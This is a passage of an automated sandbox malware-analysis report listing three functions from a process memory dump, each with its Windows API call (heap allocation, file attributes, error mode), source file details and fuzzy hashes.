                                          Function 02F99130 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(02F81469,?,02F95207,02F81469,02F950CF,02F95207,?,02F81469,02F950CF,00001000,?,?,00000000), ref: 02F9916F
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction ID: 70f9c647e6917c2fbda70b3143d4ea4f9eb558e765be3d986c3ea295294cd654
                                          • Opcode Fuzzy Hash: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction Fuzzy Hash: E5E092712002047BD614EE58DC45F9B37ADEFC9750F408419FA0CAB241C632BD108BB8
                                          Function 02F87DB0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F87DDC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 948f872ac9a85a7698696cc801099d7bd7d0cf887a6cc5a20f0c56fd53f01077
                                          • Instruction ID: 87159b9f3f223b718a934f26707e92c90dd5ab7d4d5eabe5937170fa6454327b
                                          • Opcode Fuzzy Hash: 948f872ac9a85a7698696cc801099d7bd7d0cf887a6cc5a20f0c56fd53f01077
                                          • Instruction Fuzzy Hash: 5AE0867765020427FB247AA8DC45F76B3588B487A8F784660BA1DDB2D2F678F5018660
                                          Function 02F87BA0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,02F81760,02F97A0F,02F950CF,02F81723), ref: 02F87BD3
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: f4473c7b0d079e6a2f6793ef6e50e0cba74fcda9bde93c654e34acf3c668a0d3
                                          • Instruction ID: 669868c748aa8145f44e28bb6ca46a2823a8e78e8b203ff52b4467ba0a7d64f2
                                          • Opcode Fuzzy Hash: f4473c7b0d079e6a2f6793ef6e50e0cba74fcda9bde93c654e34acf3c668a0d3
                                          • Instruction Fuzzy Hash: B3D05EB16502047BF610FAA49C06F17768E8B047A4F148478BB0CD76C2E965E1004A65